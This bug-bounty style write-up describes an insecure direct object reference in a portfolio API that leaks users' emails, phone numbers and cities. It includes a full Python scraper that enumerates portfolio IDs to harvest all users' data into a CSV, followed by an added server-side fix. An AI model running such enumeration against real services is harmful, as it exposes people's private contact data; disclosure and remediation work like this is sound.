Exposing Information Of All Users “Email, Mobile Number, etc.”


Dr404

Hello friends,

I will discuss how I can expose the information of all users, such as email addresses, phone numbers, city, etc.

Let’s start.

After deep diving into the target, I found this endpoint.
api/v1/portfolio.php

I realized that my account information was exposed.

When I interacted with this endpoint after changing the value of the ‘feedPerPage’ parameter, I found that the number of emails increased to 5186.

When I tried to change the value of the ‘portfolioId’ parameter, the displayed information changed to another user’s data. I realized that this behavior depended on the ‘portfolioId’ parameter, which was exposed in the endpoint response. With my limited knowledge of Python and using ChatGPT, I wrote this code.

The code takes an ‘ids.csv’ file that contains portfolio IDs and extracts information to a CSV file.

import requests
import csv

url = "https://example.com/api/v1/portfolio.php"

params = {
    "ex": ".................................",
    "xtoken": "...........................",
    "list": "supporters",
    "paginationType": "pointer",
    "pointer": 0,
    "feedPerPage": 10000,
    "versionCode": 965,
    "sortBy": ""
}

csv_file_path = 'all_user_profiles.csv'

with open(csv_file_path, 'w', newline='') as csvfile:
    fieldnames = ['User ID', 'Username', 'First Name', 'Email', 'Mobile Number',
                  'Feed Count', 'Follower Count', 'City', 'Country', 'Photo URL', 'Portfolio URL']

    writer = csv.DictWriter(csvfile, fieldnames=fieldnames)

    writer.writeheader()

    ids_csv_file_path = 'ids.csv'

    with open(ids_csv_file_path, 'r') as id_file:
        reader = csv.reader(id_file)
        for row in reader:
            if row:
                portfolio_id = row[0]

                params['portfolioId'] = portfolio_id
                print(f'working on portfolioId {portfolio_id}')

                response = requests.get(url, params=params)

                if response.status_code == 200:
                    data = response.json()

                    if 'result' in data:
                        user_profiles = data['result']

                        for profile in user_profiles:
                            userid = profile.get('USERID', '')
                            username = profile.get('USERNAME', '')
                            firstname = profile.get('FIRSTNAME', '')
                            email = profile.get('EMAIL', '')
                            mobile_number = profile.get('MOBILE_NUMBER', '')
                            feed_count = profile.get('USER_FEED_COUNT', '')
                            follower_count = profile.get('USER_FOLLOWER_COUNT', '')
                            city = profile.get('CITY', '')
                            country = profile.get('COUNTRY', '')
                            photo_url = profile.get('PHOTO', '')
                            portfolio_url = profile.get('PORTFOLIO_URL', '')

                            writer.writerow({
                                'User ID': userid,
                                'Username': username,
                                'First Name': firstname,
                                'Email': email,
                                'Mobile Number': mobile_number,
                                'Feed Count': feed_count,
                                'Follower Count': follower_count,
                                'City': city,
                                'Country': country,
                                'Photo URL': photo_url,
                                'Portfolio URL': portfolio_url
                            })
                    else:
                        print("")
                else:
                    print("")

Python Code

“Make a cup of tea, and come back later to retrieve all users’ information.”
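
For the fix side, here is an added example (not part of the original write-up and not the target's code) of the three server-side checks whose absence made this possible: an ownership check on the portfolio ID, a cap on ‘feedPerPage’, and an allow-list of response fields. The owner-only rule, the cap of 50, the choice of public fields and the sample data are assumptions.

```python
# Added example: hypothetical handler logic for the "supporters" list.
# Field names come from the response keys shown in the write-up; the owner-only
# rule, the page-size cap and the public-field choice are assumptions.
PUBLIC_FIELDS = ("USERID", "USERNAME", "FIRSTNAME", "PHOTO", "PORTFOLIO_URL")
MAX_FEED_PER_PAGE = 50

# Constructed sample data: portfolio "1001" belongs to alice and has 80 supporters.
PORTFOLIO_OWNER = {"1001": "alice", "1002": "bob"}
SUPPORTERS = {
    "1001": [
        {"USERID": str(n), "USERNAME": f"user{n}", "FIRSTNAME": f"Name{n}",
         "EMAIL": f"user{n}@example.test", "MOBILE_NUMBER": f"555-01{n:02d}",
         "CITY": "Testville", "PHOTO": "", "PORTFOLIO_URL": f"/p/{n}"}
        for n in range(1, 81)
    ],
    "1002": [],
}


class Forbidden(Exception):
    """Raised when the session user may not read the requested portfolio."""


def clamp_page_size(requested):
    """Never trust the client's feedPerPage: parse it and bound it."""
    try:
        size = int(requested)
    except (TypeError, ValueError):
        return MAX_FEED_PER_PAGE
    return max(1, min(size, MAX_FEED_PER_PAGE))


def list_supporters(session_user, portfolio_id, feed_per_page, pointer=0):
    # 1. Object-level authorization: the ID in the request must belong to the
    #    authenticated session, not merely exist.
    owner = PORTFOLIO_OWNER.get(str(portfolio_id))
    if owner is None or owner != session_user:
        raise Forbidden(f"portfolio {portfolio_id} is not readable by this session")
    # 2. Bounded pagination, whatever value the client sent.
    size = clamp_page_size(feed_per_page)
    start = max(0, int(pointer))
    page = SUPPORTERS[str(portfolio_id)][start:start + size]
    # 3. Allow-list serialization: EMAIL, MOBILE_NUMBER and CITY never leave the server.
    rows = [{key: row.get(key, "") for key in PUBLIC_FIELDS} for row in page]
    return {"result": rows, "pointer": start + len(page)}
```

With these checks in place, a request carrying feedPerPage=10000 gets 50 rows with no contact fields, and a request for someone else's portfolio ID is refused.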

Thanks for reading
